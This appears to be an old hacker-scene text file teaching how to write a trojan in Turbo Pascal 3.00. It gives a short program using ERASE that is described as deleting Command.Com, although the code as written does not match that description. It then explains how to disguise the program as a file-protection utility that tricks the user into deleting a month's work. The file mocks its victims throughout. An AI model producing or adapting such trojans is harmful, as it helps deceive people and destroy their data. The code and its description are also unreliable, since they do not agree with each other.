How to Write Trojans in TP v3.00 ----------------------------------------------------------------------- This phile will go into the use of the command ERASE (f). What this trojan will do is go to the root directory and erase the file Command.Com. It will cause some minor grief, but there are other uses for Erase. Here is a sample program - Program Trojan; Procedure Erase_Command; Var ElFile : File; Begin Assign (ElFile,'c:\'); Erase (ElFile); end; BEGIN Erase_Command; END. Now this program is very simple. You need to change it up yourself to make it look inviting to the sucker. One thing you can try is to advertise it as a file that will put a protection on another file so that it won't get erased. Have the program ask it for the file with the directory, and pass it to a variable that will intern be the file variable that will be erased. Have it say 'File Protected!' or some other means of expressing it being done. Have it sit in a loop so that the bozo will sit there and delete his whole months work, and have him explain that one to his Boss.. Always make it look like it is something they can't refuse. There are always suckers waiting to get fucked, all you gotta do is throw them the bait! [Brought to you by: Hi Fi Del]